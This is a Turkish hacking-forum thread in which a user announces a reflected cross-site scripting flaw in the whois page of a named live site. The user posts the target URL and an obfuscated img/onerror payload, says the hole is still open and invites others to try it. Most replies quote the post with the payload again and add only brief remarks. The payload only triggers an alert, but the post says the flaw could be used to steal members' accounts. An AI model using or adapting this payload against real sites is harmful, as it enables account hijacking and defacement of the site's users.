Spyhackerz hacked , Xss Açığı | LETRX (1 Viewer)

SCYLL4

SCYLL4

Joined
Dec 2, 2019
Credits
0
Rating - 0%
Letrx said:
Selamlar herkese sabah whois sorgulamak için girdiğim yerde 10 dakikada bulduğum xss'tir.
-Pek zararı olur mu?
+Tabikide olur.
prompt değeri alınarak üyelerin hesabı çalınabilir yada benım yaptığım gibi url kısmına html tagları içinde index atılabilir bu heyk sayılmaz ama yinede {reflected xss} en tehlikeli açık türüdür.

Ödül : 0$

Açık hala aktif kendiniz deneyebilirsiniz.
PoC:

View hidden content is available for registered users!

[like]
Url : https://spyhackerz.org/whois.php?domain
Payload: ">$cat /<img id=%26%23x101; src=x onerror=%26%23x101;;alert`HEYKID-BY-LETRX`;>

[/like]




LETRX
Yakup YILDIR
Click to expand...
 
R3YD3R

R3YD3R

Joined
Dec 3, 2018
Credits
47
Rating - 0%
Letrx said:
Selamlar herkese sabah whois sorgulamak için girdiğim yerde 10 dakikada bulduğum xss'tir.
-Pek zararı olur mu?
+Tabikide olur.
prompt değeri alınarak üyelerin hesabı çalınabilir yada benım yaptığım gibi url kısmına html tagları içinde index atılabilir bu heyk sayılmaz ama yinede {reflected xss} en tehlikeli açık türüdür.

Ödül : 0$

Açık hala aktif kendiniz deneyebilirsiniz.
PoC:

View hidden content is available for registered users!

[like]
Url : https://spyhackerz.org/whois.php?domain
Payload: ">$cat /<img id=%26%23x101; src=x onerror=%26%23x101;;alert`HEYKID-BY-LETRX`;>

[/like]




LETRX
Yakup YILDIR
Click to expand...
bakalım
 
J

j1mbji

Joined
Dec 5, 2019
Credits
0
Rating - 0%
Letrx said:
Selamlar herkese sabah whois sorgulamak için girdiğim yerde 10 dakikada bulduğum xss'tir.
-Pek zararı olur mu?
+Tabikide olur.
prompt değeri alınarak üyelerin hesabı çalınabilir yada benım yaptığım gibi url kısmına html tagları içinde index atılabilir bu heyk sayılmaz ama yinede {reflected xss} en tehlikeli açık türüdür.

Ödül : 0$

Açık hala aktif kendiniz deneyebilirsiniz.
PoC:

View hidden content is available for registered users!

[like]
Url : https://spyhackerz.org/whois.php?domain
Payload: ">$cat /<img id=%26%23x101; src=x onerror=%26%23x101;;alert`HEYKID-BY-LETRX`;>

[/like]




LETRX
Yakup YILDIR
Click to expand...
ellerine sağlık
 
PolatYılmazx1

PolatYılmazx1

Joined
May 5, 2019
Credits
132
Rating - 0%
Letrx said:
Selamlar herkese sabah whois sorgulamak için girdiğim yerde 10 dakikada bulduğum xss'tir.
-Pek zararı olur mu?
+Tabikide olur.
prompt değeri alınarak üyelerin hesabı çalınabilir yada benım yaptığım gibi url kısmına html tagları içinde index atılabilir bu heyk sayılmaz ama yinede {reflected xss} en tehlikeli açık türüdür.

Ödül : 0$

Açık hala aktif kendiniz deneyebilirsiniz.
PoC:

View hidden content is available for registered users!

[like]
Url : https://spyhackerz.org/whois.php?domain
Payload: ">$cat /<img id=%26%23x101; src=x onerror=%26%23x101;;alert`HEYKID-BY-LETRX`;>

[/like]




LETRX
Yakup YILDIR
Click to expand...
o_O
 
Khhujigg

Khhujigg

Joined
May 7, 2021
Credits
8
Rating - 0%
11 said:
Selamlar herkese sabah whois sorgulamak için girdiğim yerde 10 dakikada bulduğum xss'tir.
-Pek zararı olur mu?
+Tabikide olur.
prompt değeri alınarak üyelerin hesabı çalınabilir yada benım yaptığım gibi url kısmına html tagları içinde index atılabilir bu heyk sayılmaz ama yinede {reflected xss} en tehlikeli açık türüdür.

Ödül : 0$

Açık hala aktif kendiniz deneyebilirsiniz.
PoC:

*** Hidden text: cannot be quoted. ***




LETRX
Yakup YILDIR
Click to expand...
.
 
You must log in or register to reply here.

Users who are viewing this thread

Total: 2 (members: 0, guests: 2)
Top